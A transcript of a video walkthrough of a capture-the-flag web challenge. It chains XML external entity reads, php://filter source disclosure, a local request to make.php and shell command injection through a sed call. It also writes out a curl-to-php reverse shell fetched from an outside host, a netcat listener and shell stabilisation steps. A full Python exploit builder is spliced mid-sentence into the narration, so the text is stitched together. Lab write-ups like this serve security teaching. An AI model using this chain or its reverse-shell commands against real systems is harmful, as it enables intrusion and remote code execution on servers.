Hello everyone, my name is John Hammond, and I wanted to showcase some of the All-Army CyberStakes. So this was ACI CTF, cyberstakes.acictf.com. They put on a competition throughout this past week, and they had a lot of fantastic challenges, so I really wanted to showcase some of them to you. Hopefully this will be the first video that I'm recording; I hope to do many, many more. What I want to do is actually start with some of the harder challenges that I was able to solve, so I don't burn out while I'm trying to record all these, because there are a lot of them, and I'd still like to be able to showcase all of them for you, or as many as I can.

So this challenge is called "Extremely Malicious Language". It was worth 300 points. I guess at the time of recording right now 32 people have solved it. It's currently Friday; the game ends on Sunday, so I want to get this recording in before they take some of the challenges down. It says there's a CyberMap, see if you can gain RCE to execute ./flag. Okay, so if I fire this up in another page, it looks like I'm greeted with just sort of a little login over here that requires a username and password. LastPass is trying to fill some stuff in for me. So when I fill that in with given credentials... I don't, admittedly, I can't guess what they are, so I don't know exactly what to do on that, and I don't want to add these to LastPass.

So, truth be told, and I'll be as transparent as I can be with all of you: because this is running out of the picoCTF framework (a lot of fantastic stuff in here), they do offer hints for some of these challenges, and I like to be open and honest with you. This is all about learning, this is all about education, this is all about us trying to sharpen our skills. So if there's no point degradation, or if they don't cost anything to take a hint, I'm gonna look at the hints. I think that's interesting, that's cool, right?
"When a black hat crosses your XPath." "When a dark entity can reveal a lot about your operation." Okay. "Take command of the system." And "check out source.zip if you're stuck." Oh, is that just a thing we can access? If I try to go to source.zip... okay, looks like that is just a thing I can download. So let me actually create a directory for us to start to work in. I'll create a little aci, and then I will go ahead and wget that down. Well, let's actually make a challenge name for this, extremely_malicious_language, and hop over there. Now we'll wget that source file. It is a zip file, so we can go ahead and unzip it. It looks like it gives us webroot, webroot, webroot, webroot and all these PHP files. So okay, looks like we're working with PHP then. Let's take a look at the index.php.

Let me pause to kind of clear up my Sublime Text notes here. Okay, I also noticed my webcam was a little off, so hopefully that's a little bit better of me, and I'll try and shrink that down if it gets too big. But anyway, this is the source code for our index. It will load in funcs.php; looks like that's necessary for the page. And if we are logged in... oh, it will, okay, offer us a page to log out, and it will try and bring us to genmap and create a little textarea form. Okay, if we aren't logged in, that PHP else statement there, it says: POST to login.php with text username. Okay, these are the input fields that we are looking at. So funcs.php we should totally check out, along with login.php. So let's take a look at that. My face is in the way already; I'm just gonna shrink me. Okay.

Now let's go check out that login.php: require funcs, login, start, and it will log in with POST username and POST password. So it looks like those are just the entry fields that I'll need to supply. They'll get passed in with the HTTP method of POST to that form, and login is probably a function inside of funcs.php. So let's fire that up. Oh, okay.
It looks like we have functions to parse XML, and that must be back on the index page: what this form is, XML, cybermap, CN, country. Okay, so these are forms we could give to XML. The read_creds function: my file will open creds.xml. Do we have that file? ls. Do we not have creds.xml? Is it on the page? Is that something we can access, creds.xml? Ah, it doesn't have any style information associated with it, but user is admin and pass is empty. Does that work if I just log in with admin and nothing? Okay, now we're logged in. So we have this entry, a little textarea, where we could supply seemingly some XML and then generate it, and there's that login button that we saw. So let's go ahead and click this. Okay, we generated a map, it seems, with some of the countries that were probably in this prefix here, maybe highlighted. Oh, generate, yeah, okay.

So let's look more at kind of what that's doing, because we have the source code. So login: that function will read out of the creds that we just got from read_creds. Is that an XPath? Oh yeah, maybe that's something that we could have seen, like if I were to log out, log in... that doesn't have it either. Huh, I didn't pay too much mind to that XPath, I will totally admit. So we had the source code and we could go ahead and log in now that we found where that location is, and that is what it allows us to do. So back in that index page, it looks like once we POST our input in that textarea, it'll go to genmap.php. So let's go see what that is. Do we have that source code? Yep, we do. Okay, requires funcs again, creates a session for us. genmap is what is being run, maybe. Not yet, it seems like. So it needs a name entry out of the XML, it needs at least one country, and that's supposed to be an array, and it'll validate that each country has two capital letters in it, and that looks pretty solid.
I can't use, like... there's no E or I modifier; I can't control that regex to do anything interesting with PHP that might give me some potential code execution with that avenue. So that looks sound, at least from first glance, right? Target: what it goes to, itself, to make.php, and passes in these arguments, the countries that we supplied, the ones that were validated, and the name, and then it will make a curl request with these, curl_exec. Challenge, okay. Otherwise it'll output, die on generating that map. Okay, and then it will run it with all the input that we supplied and output that out. Okay, so we could totally just finagle this to whatever we want, right? "Please subscribe", generate. Okay, and that put it in the title up here. So if I view the source on that web page, it looks like the title of that page is what's being returned. Using the countries might be annoying, because we're limited in what we can supply. "OL": it has to be only two letters. Anything with a typo in it, whatever... maybe, okay, maybe it just didn't care, it just throws those out. That's fine.

So looking at this, it looks like we have an interface to work with XML. So I guess we can kind of gather that off of the name of this challenge, Extremely Malicious Language, or XML. The whole point is that this could potentially be an XXE attack, and that might be referenced in this other hint here: a dark entity can reveal a lot about your operation.
So maybe we could run some of those external entities that are necessary for an XXE attack. So I'll search for PayloadsAllTheThings XXE injection. I have this kind of in my history because I've obviously done this previously. So what we could be doing with XXE is usually like load files or read some specific files, or perhaps load another entity or a DTD, a document type definition, to maybe exfil some data out of that server. So this will be kind of interesting, to be able to determine whether or not we can actually get code execution.

So let's start to finagle this. What I'm gonna do is I'll create, just in this current directory here, just a test, or a poc.xml, I guess, like a proof of concept, and I'll copy and paste that payload that's just a proof of concept from PayloadsAllTheThings, and I'll go ahead and grab in the same definition that I might need from what the page supplies, because we're probably going to need to keep the exact same element name. So we'll need cybermap and the name and country, etc. I don't think I need that, but DOCTYPE replace example there, so that will just replace that in. So if I change cybermap to that example syntax, it'll get the value that we read out of this entity that XML is going to be providing for us, because of that XXE abuse here. So it should say "cyber Doe" if that works. So slap that in, generate it, and there we go. So I can see over in the title here, that says "cyber Doe". Okay.

So what could we do with this, right? If we go back to the XXE, we could be able to use this to actually get information out of the file system. We could read files; that would be handy. We could try and read a file, /etc/passwd, because that looks like a simple proof of concept. The syntax that they change here is just using SYSTEM as kind of the prefix, and I guess test works fine here.
Let's try and finagle that. They're using a different setup: DOCTYPE, DOCTYPE, all this, and they have a new line on xxe, that's what they're referring to. Let's just copy that and try that guy. DOCTYPE foo, ELEMENT foo, could be any entity; xxe will read from a specific file for us. So let's try that now. It's no longer called example, but the variable is going to be xxe, and we'll slap that into the little test around there. Okay, that had an error. We could try... well, it's weird to me, because when we looked at this earlier, it's only filling this in at the line for the title. Maybe if it has multiple lines in that output it'll get kind of annoyed and freaked out. So let's try something else that might actually only have one line in it, like hostname, and we'll see if that actually returns for us, or if our syntax is wrong. Oh, no no no, that works. So if I view the source here, now it says cyberchallenge.prod, so a little production challenge, I guess, but that is the value inside of our /etc/hostname file. So that could work potentially. Looks like we can read files, but we still are kind of limited in what files we can read, because, well, it's limited by a line, right?

So let's try and expand on this. We know that PHP is installed. So if I keep looking at some of these PayloadsAllTheThings here, they might be using some other techniques to maybe use a PHP filter or a PHP wrapper to be able to read some of these files or get some access here. They're using that filter, converting it to base64, and then specifying a specific resource. So let's use that, and then let's try and read /etc/passwd again. So /etc/passwd will be the final resource that we need. We'll go slap that in for our XML, and that seems to fail. Okay. Is there anything else we could read that might be worthwhile for us?
Well, we could try and get just the source code, like index.php is what we know the name of the source code is, so let's paste that in, and that seemed to work. If I view the source now, we have this giant base64 string. So let's verify that that is exactly what we expected. Let me copy that, open up a simple terminal here, I'll just echo all of that noise into base64 -d, and okay, we are getting in fact the same index.php that we saw. So we could potentially read the source code of the web page; we could get some of the valuable information that's kind of behind this application.

Interestingly enough, though, when we were looking through the source code that we retrieved, that we were able to download with that source.zip, it mentioned in that genmap function, or the genmap.php script, it's calling out to make.php. So is that something we could access? Can I get to make.php kind of on my own? make.php: "unauthorized, locals only". That's weird. Well, we don't have access to this page, I guess, from the outside, but we know with our XXE attack we could read in a file, and it doesn't matter if it has newlines now, because we learned about that PHP filter trick. Maybe we could actually access that make.php page. Let's see: if we slap this in, will that work for us? Can I read the source code of make.php? Nice, looks like it got that base64. So let me try and get this here, that we'll throw into our terminal again just to base64 decode it, pipe that to base64 -d, and I'll redirect it to our make.php, so I could subl all that, get some good syntax highlighting. And it says remote address is not working "because containers are the future and the future is now".
Okay, this should effectively restrict it to local requests only, so that was the error that we saw. It looks like only itself can request this page, only the application, or what's running on challenge at ACI. So I can't reach it from my own browser, like we just tried. Okay. So what we do if this page actually gets to execute, and what's really happening when we make this request in genmap: when we give it our XML, it will take the countries that this page has validated, and it will run them in an expression, or it looks like a command; looks like it's running sed with, joining all of the country variables, okay, just so piping them together, not piping them but making them an OR statement, like for regular expressions for sed. And all of that is filled with a world.svg, and that's the file that it must use. Okay, and then just displays it all out, echoes that with the name in there, with htmlspecialchars. So probably no, like, cross-site scripting or weirdness, but anyway, it's running shell_exec; it's like running commands, and we have potentially a vector to get some code execution there, because it's working with that GET variable, or the country that we can supply. But we know that limitation of having only two uppercase letters in the country, so that doesn't work all that well for us, except...

Because we could use this XXE attack, maybe we could have it request this page. Can it request, like, any page that we want? Like, if I just... so let me get to my server. I'll just go up to a location out in the real world that's not behind, that would actually have a... like, let's make a directory xml, get in there, and then let's run a simple HTTP server. I'll use Python 3; I think Python 2 is still what's aliased to regular python, on port 8888. So if I were to go access johnhammond.org at 8888, I see myself. That's good. Can I make that web page go to it, if I change that payload? Can I... maybe I could use it with the PHP response, with the filter here.
So let's http://johnhammond.org:8888. Move all this in. Please get me back to a page where I can actually use the XML. Good. Oh, that rendered, and I saw the request. Okay, fantastic. So if I view this now, I have the base64 output of that. Good, good. echo, let's just verify that that actually is returning what we would expect it to, base64 -d. Yep, good. That gets the HTML of the response from the server.

So we could make this application call that make.php page, or reach out to it, and maybe it could... oh, it won't try and validate the country variable. Only the genmap script does. So we could have unlimited access to what that country variable might be, and we might be able to break our way out of this command that's being executed, that's running. So if I look at this, let me just kind of sketchboard this out here. sed works with an expression; make this all on one line. It joins me into single quotes, single quotes. So that's the command. So if I break out of single quotes, sed might fail, but it will still work, right? And then it adds in the country. Let's try that in the terminal. Let me close that, and then let's just, like, let's run a stupid sed command. And if this were where I was injecting other commands, something that maybe we could get the server to run, we could close out of our single quote and then have a colon, or semicolon, to start a new command and then do something like id. So sed will whine, but that doesn't matter; I don't care. I want the output of that command. So maybe we could get that to work if we give it a country list and a name, literally anything.

So let's try that. Let me try to get to that page. How do they access it in genmap? Do they reach it on the port? They do; they reach it on the port. So make.php with some of the GET variables in there, and I want that all to be URL-encoded, because it might do some weird things inside of XML, inside of XXE. So let me try and do that. I think that's in Python.
So python3. Yep, that's fine. import urllib.parse, right. Yeah, so urllib.parse.urlencode, and that takes a dictionary, doesn't it? Yeah, okay. So we want our country as a list to have a single quote, a semicolon, and then a command, and then let's add a comment just to remove the whole rest of that line there. And then we will supply a name that can be literally anything that we want; that can be "pleasesub", sure. So now those are going to be the arguments that we would give to that call in our XML, right? So when we use the PHP filter to get the base64 response returned from this web page, that we can call locally with the arguments of country to be whatever we want and pleasesub as the name, let's try that, just to see what we could do. Generate. That worked. Okay, so checking this out, we have all this base64 here. Let's go ahead and see what that responds with. Crap, I probably need that, because I want to be able to edit that again. Let me import urllib one last time, urllib.parse, and let's make a new shell just so I can echo this string into base64 -d, and it returned the output of the id command. Oh my gosh, excellent. Okay, okay.

So we have code execution, right? We could potentially run commands. What can we do? We would like to get a reverse shell, right? I mean, ideally, but I don't know what we have actually accessible on that machine. So let's see what commands might work. Let's go back and copy our urllib syntax here. So the commands that we want to run: let's see if we have curl, curl. See if we have netcat.
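The two pieces of the chain walked through above, the php://filter base64 read through the XXE entity (used for index.php and make.php) and the URL-encoded make.php query that breaks out of the single-quoted sed expression, put together as an added Python example. This is not code from the video or from the challenge. The loopback host and port in MAKE_URL, and the exact sed script in simulated_make_command, are assumptions, since neither is shown on the page; the element names are the ones the challenge's form used.

```python
import base64
import re
import shlex
from urllib.parse import urlencode

# Assumption: the host/port genmap.php uses to reach make.php over loopback is
# not given in the video, so this is a placeholder to be replaced.
MAKE_URL = "http://127.0.0.1:8080/make.php"


def php_filter_uri(resource):
    """php://filter with base64 encoding. The resource comes back as a single
    base64 line, so a multi-line file survives being dropped into <title>."""
    return f"php://filter/convert.base64-encode/resource={resource}"


def xxe_document(entity_uri, countries=("US", "CN")):
    """The cybermap document with a SYSTEM entity expanded inside <name>, which
    the application reflects into the page <title>. Element names follow the
    challenge's own form (cybermap/name/country)."""
    country_xml = "".join(f"<country>{c}</country>" for c in countries)
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE cybermap [<!ENTITY xxe SYSTEM "{entity_uri}">]>'
        f"<cybermap><name>&xxe;</name>{country_xml}</cybermap>"
    )


def make_php_injection(command, name="pleasesub"):
    """Query string for make.php: the country value closes the single-quoted sed
    expression, runs `command`, and comments out the rest of the line. urlencode
    turns the '#' into %23 (a raw '#' would be a URL fragment and never reach
    PHP) and keeps the quote and semicolon out of the XML entity literal."""
    query = urlencode({"country[]": f"';{command} #", "name": name})
    return f"{MAKE_URL}?{query}"


def rce_document(command):
    """Full chain: XXE -> php://filter -> local request to make.php -> shell_exec."""
    return xxe_document(php_filter_uri(make_php_injection(command)))


def simulated_make_command(countries):
    """Shape of the shell command make.php builds, as described in the video:
    countries joined with '|' inside a single-quoted sed expression over
    world.svg. The s/// body is assumed; the page does not show the real one."""
    pattern = "|".join(countries)
    return f"sed -E 's/id=\"({pattern})\"/id=\"\\1\" class=\"hit\"/' world.svg"


def shell_words(command):
    """Tokenise the way a POSIX shell would (';' becomes its own word and '#'
    starts a comment) to show where the injected country splits the command."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))


def decode_title(html):
    """Pull the base64 blob out of <title> and decode it, as base64 -d did."""
    m = re.search(r"<title>(.*?)</title>", html, re.S)
    if m is None:
        raise ValueError("no <title> in response")
    return base64.b64decode(m.group(1).strip()).decode()


if __name__ == "__main__":
    print(xxe_document(php_filter_uri("index.php")))
    print(rce_document("id"))
    print(shell_words(simulated_make_command(["US", "CN"])))
    print(shell_words(simulated_make_command(["';id #"])))
```

With two valid countries, shell_words returns four words and the whole sed expression stays one quoted argument; with the injected country it returns `['sed', '-E', 's/id="(', ';', 'id']`, which is exactly why sed complains and `id` still runs. The `&` between query parameters is fine inside the entity because an XML SystemLiteral is not scanned for entity references. On the defensive side the two bugs being chained are external entity loading left enabled in the XML parser and request input concatenated into a shell_exec string; the country list can be checked against a fixed allowlist before it ever reaches a shell.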
Let's see if we have wget. Let's see if we have Python. And let's actually check out what directory we're in. So we could script this; when I have tried to do this, PHP and the XML stuff didn't seem to behave when I had Python send it along. I didn't find out why, nor did I particularly care to, honestly, but this method wasn't all that bad: just kind of creating it and then sending it along, grabbing all that HTML out. So let's see now, if we echo this guy into base64 -d, what have we got? We have curl, we have netcat, we have wget, and we seemingly have Python, and we're in this path for the webroot. Okay.

So if we have curl, then we could just download a PHP reverse shell, could we not? I need to be back on my server, so let me try to nc -lnvp 8888 to listen and wait for that, so we have something out there on the internet for it to connect back to. And let's go create... have another shell open here that I'm working with. So let's go make a reverse shell that we could host, also on that server. So okay, anyway, let's move into that directory. So aci, extremely_malicious_language. Let's copy our /opt reverse shell, the php-reverse-shell, right over to this directory. Let's subl that, and let's make it connect back to johnhammond.org, because that's what I'm going to use as my kind of BYOB, bring your own box, all on 8888. And let's actually move that to, like, revshell.php, just so it's nice and easy for us. So now let's go put that over on my machine. So scp revshell over to johnhammond.org, out there in the world, in the cloud, and /home/john/xml, right? Okay, good. So now we can SSH to johnhammond.org and spin up a simple web server, just as we had previously, so that the victim could go ahead and download the revshell and give it to php, because php is probably already installed, because it's running PHP, right? So python -3... python3, sorry, -m http.server. Let's open it on 9999. Let me make sure that my firewall is totally cool with that.
Yep, it is. Okay, let's spin that one more time just so I can see the output, and let's make our command, which needs to be in this URL-encoded form. Let's make him go ahead and curl http://johnhammond.org:9999/revshell.php, and let's pipe that to php. So once that downloads, it will go ahead and access this netcat shell, which is waiting and listening; that's going to catch our reverse shell. Let's try that. That URL-encoded output needs to be what we supply as our argument. So let's make these both visible, and let's go fire this up, paste that in here, generate. So it reached back to the server, there we go, and we have our shell. Okay, fantastic.

So, did we have Python? It said we had Python, /usr/bin/python. Will that work for me? /usr/bin/python -c 'print "hello"'. Hello, okay. So /usr/bin/python -c 'import pty; pty.spawn("/bin/bash")', just to get a stable shell. Great. Let's background that, stty raw -echo, and background that, and now let's export TERM=xterm. Now I can clear my screen and work with things nice and easily. Okay, I'm in the root directory. Where the heck was I? We had that output. Do I have a home? I don't have a home. Oh well, okay. What was the path to that we saw just a moment ago? /opt/problem-something. Did we have that in here? No, that was... oh, there we go: /opt/problems/, extremely malicious language, all the way to their webroot. So let's get back to that other shell where we are interacting with the target. Let's paste that in. Wow, that screwed up my prompt. Uh, let's export PS1 to equal the literal dollar sign. There we go. Okay, ls: flag. Nice. So ls -la: flag is actually a binary. I went ahead and ran file on it, and it could see that's an executable. So if I ./flag, there we go. That's the solution, that's the answer, that's the flag that would get us 300 points. So a little bit of a long-winded challenge with a lot of cool moving parts, right?
So a website that has XXE in it, or at least is vulnerable to XML external entities. We could use that to read files. We could use some of the PHP filters to read files in a filtered way, like with base64 encoding, and that would allow us to go ahead and actually get files that are longer than one line, because we could do it with the name, but we were kind of limited in the functionality of that country variable we could supply. So we were able to go ahead and actually use the local file inclusion that we essentially just had to go read the other source code and the other pages of the website that we wouldn't normally have had access to, and we found there is one endpoint, make.php, that is actually running a command with our input, like with an HTTP GET variable. And if we were to request just that page, like locally, because it needed to be accessed through itself, again using our XXE attack, we would be able to run code. We just needed to break out of the sed command that was already running, and then we could get whatever we wanted to; we had code execution at that point. So we could try and get a reverse shell so we could access it, and then, well, now we have the flag and we have access to that machine. So super duper cool challenge. I really hope you guys liked it. 300 points, so hopefully it was one of those big hitters, one way and bam stuff. But that's all I wanted to showcase for this challenge, for this video, Extremely Malicious Language. I hope to be recording a lot more of these. I hope... there are actually a ton that I want to get through, and I think a lot of these would be really, really cool to show you. So, all right, that's it for this video, everybody. Thank you so much for watching. I'll see you in the next one. Please click that like button. Wow, I'm fading out; I've been talking for too long. Hit that like button, leave a comment, subscribe, hit the bell, all the other YouTube algorithm stuff, and I'd love to see you guys on Patreon.
Thank you so much for your support. PayPal, if you're willing to drop something quick and easy. See you on the Discord; there's a link in the description. Instagram, Facebook, Twi... LinkedIn, Twitter. Oh god, I need to stop this video. Thanks everybody, I'll see you in the next one. Take care.